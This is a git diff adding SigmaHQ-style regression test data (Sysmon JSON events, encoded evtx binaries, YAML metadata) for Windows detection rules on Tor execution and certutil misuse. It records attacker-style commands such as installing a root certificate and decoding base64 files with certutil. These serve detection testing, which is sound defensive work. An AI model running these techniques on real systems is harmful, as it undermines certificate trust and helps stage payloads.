"SHA1=9D317F48BA264346D1BA2DA10B0893B156FA69BF,MD5=66D34277F992DB4CA8561FD1A5C483E4,SHA256=683574EBC203C630AF98256516D7CBC50E270E7C5A56E1D46CB9CA671B3D9F32,IMPHASH=EEC7642CF938691D739D1F9BED0DF74D", + "ParentProcessGuid": "5AA13A44-B135-68FE-025F-000000004002", + "ParentProcessId": 1292, + "ParentImage": "C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe", + "ParentCommandLine": "\"C:\\Users\\Administrator\\Desktop\\Tor Browser\\Browser\\firefox.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml new file mode 100644 index 000000000..267915f73 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml @@ -0,0 +1,12 @@ +id: 8e750cec-bc57-4b20-bd0a-006733558c56 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c + title: Tor Client/Browser Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx new file mode 100644 index 0000000000000000000000000000000000000000..4526bfaff5811cd1e030c55adf20474f0e8cad66 GIT binary patch literal 69632 zcmeI0U2Ggz701tvch~E+ch^p92s9~9`AX8-@!DQ{oirrtU2hWN6cf@GB1@6+N9@Ml zwPGhUM5-cCLG+;oBwpa9luCSw2!W7Lg;WU%5JBeq`vUbmljok(#ZV(cV@Eo z#�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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.json b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.json new file mode 100644 index 000000000..b55c1820b --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T16:54:23.873276Z" + } + }, + "EventRecordID": 11383720, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 16:54:23.866", + "ProcessGuid": "5AA13A44-00BF-68FD-3F35-000000004002", + "ProcessId": 8592, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -addstore -f root C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\cert.cer", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml new file mode 100644 index 000000000..ed41b8f49 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml @@ -0,0 +1,13 @@ +id: 5969ddb0-b4ab-47c9-a12b-471d6c6551c8 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: d2125259-ddea-4c1c-9c22-977eb5b29cf0 + title: New Root Certificate Installed Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx new file mode 100644 index 0000000000000000000000000000000000000000..5c755afbd5bcf7b3ce822246ead4ac7fa43cd6d4 GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json new file mode 100644 index 000000000..46c374057 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T16:56:16.019794Z" + } + }, + "EventRecordID": 11418519, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 16:56:16.013", + "ProcessGuid": "5AA13A44-0130-68FD-4E35-000000004002", + "ProcessId": 5112, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -decode file.base64 file-decoded.ext", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_decode/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/info.yml new file mode 100644 index 000000000..c1ab6ac35 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_decode/info.yml @@ -0,0 +1,13 @@ +id: e582dfce-5cb3-4991-9719-9a336eb90a6f +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7 + title: File Decoded From Base64/Hex Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx new file mode 100644 index 0000000000000000000000000000000000000000..429f79e942947324b3175013536ff2485c4e74a0 GIT binary patch literal 69632 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 